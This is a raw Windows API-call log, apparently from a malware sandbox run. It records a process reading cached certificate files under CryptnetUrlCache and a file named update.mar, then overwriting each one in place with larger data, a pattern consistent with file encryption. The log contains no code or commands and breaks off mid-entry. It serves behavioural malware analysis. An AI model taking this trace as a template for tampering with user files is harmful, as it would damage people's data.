[0177.421] ReleaseMutex (hMutex=0x168) returned 1 [0177.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="update.mar", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="update.mar", cchWideChar=10, lpMultiByteStr=0x1f7344c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="update.mar", lpUsedDefaultChar=0x0) returned 10 [0177.421] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0177.424] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0177.426] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x917c0 [0177.426] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0177.428] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x917c0 [0177.429] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.429] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0177.429] WriteFile (in: hFile=0x1f0, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0177.429] WriteFile (in: hFile=0x1f0, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0177.429] CloseHandle (hObject=0x1f0) returned 1 [0177.430] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.430] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.430] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x209 [0177.431] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.431] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.431] ReleaseMutex (hMutex=0x168) returned 1 [0177.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="3130B1871A126520A8C47861EFE3ED4D", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0177.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="3130B1871A126520A8C47861EFE3ED4D", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3130B1871A126520A8C47861EFE3ED4D", lpUsedDefaultChar=0x0) returned 32 [0177.431] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x209, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x2fdf2bc*=0x209, lpOverlapped=0x0) returned 1 [0177.433] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0177.433] WriteFile (in: hFile=0x1f0, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x791, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x791, lpOverlapped=0x0) returned 1 [0177.433] CloseHandle (hObject=0x1f0) returned 1 [0177.433] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.434] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.434] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x32d [0177.434] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.434] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.434] ReleaseMutex (hMutex=0x168) returned 1 [0177.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="696F3DE637E6DE85B458996D49D759AD", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0177.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="696F3DE637E6DE85B458996D49D759AD", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="696F3DE637E6DE85B458996D49D759AD", lpUsedDefaultChar=0x0) returned 32 [0177.434] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x32d, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x2fdf2bc*=0x32d, lpOverlapped=0x0) returned 1 [0177.435] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0177.435] WriteFile (in: hFile=0x1f0, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x8b5, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x8b5, lpOverlapped=0x0) returned 1 [0177.439] CloseHandle (hObject=0x1f0) returned 1 [0177.440] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.441] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.441] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1cf [0177.441] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.441] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.441] ReleaseMutex (hMutex=0x168) returned 1 [0177.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0177.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpUsedDefaultChar=0x0) returned 65 [0177.441] ReadFile (in: hFile=0x1f0, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x2fdf2bc*=0x1cf, lpOverlapped=0x0) returned 1 [0177.442] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0177.442] WriteFile (in: hFile=0x1f0, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x757, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x757, lpOverlapped=0x0) returned 1 [0177.442] CloseHandle (hObject=0x1f0) returned 1 [0177.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.443] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.443] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1cf [0177.444] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0177.444] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.444] ReleaseMutex (hMutex=0x168) returned 1 [0177.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0177.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpUsedDefaultChar=0x0) returned 65 [0177.444] ReadFile (in: hFile=0x1f0, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x2fdf2bc*=0x1cf, lpOverlapped=0x0) returned 1 [0177.445] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0177.445] WriteFile (in: hFile=0x1f0, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x757, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x757, lpOverlapped=0x0) returned 1 [0177.445] CloseHandle (hObject=0x1f0) returned 1 [0177.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0178.621] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.621] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x5ab [0178.621] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.621] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.621] ReleaseMutex (hMutex=0x168) returned 1 [0178.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0178.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpUsedDefaultChar=0x0) returned 65 [0178.622] ReadFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x5ab, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2fdf2bc*=0x5ab, lpOverlapped=0x0) returned 1 [0178.626] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0178.626] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xb33, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2fdf2d0*=0xb33, lpOverlapped=0x0) returned 1 [0178.626] CloseHandle (hObject=0x1dc) returned 1 [0178.627] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0178.628] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.628] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x5ed [0178.628] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.628] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.628] ReleaseMutex (hMutex=0x168) returned 1 [0178.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0178.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpUsedDefaultChar=0x0) returned 65 [0178.628] ReadFile (in: hFile=0x1dc, lpBuffer=0x26cf048, nNumberOfBytesToRead=0x5ed, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesRead=0x2fdf2bc*=0x5ed, lpOverlapped=0x0) returned 1 [0178.630] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0178.630] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xb75, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2fdf2d0*=0xb75, lpOverlapped=0x0) returned 1 [0178.630] CloseHandle (hObject=0x1dc) returned 1 [0178.630] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0178.631] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.631] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x64c [0178.631] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.632] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.632] ReleaseMutex (hMutex=0x168) returned 1 [0178.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0178.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpUsedDefaultChar=0x0) returned 65 [0178.632] ReadFile (in: hFile=0x1dc, lpBuffer=0x26cf048, nNumberOfBytesToRead=0x64c, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesRead=0x2fdf2bc*=0x64c, lpOverlapped=0x0) returned 1 [0178.634] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0178.634] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xbd4, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2fdf2d0*=0xbd4, lpOverlapped=0x0) returned 1 [0178.634] CloseHandle (hObject=0x1dc) returned 1 [0178.634] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0178.635] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.635] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x18a [0178.635] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.635] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.635] ReleaseMutex (hMutex=0x168) returned 1 [0178.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0178.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpUsedDefaultChar=0x0) returned 65 [0178.635] ReadFile (in: hFile=0x1dc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x18a, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x18a, lpOverlapped=0x0) returned 1 [0178.637] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0178.637] WriteFile (in: hFile=0x1dc, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x712, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x712, lpOverlapped=0x0) returned 1 [0178.637] CloseHandle (hObject=0x1dc) returned 1 [0178.637] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0178.638] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0178.638] SetFilePointer (in: hFile=0x1dc, 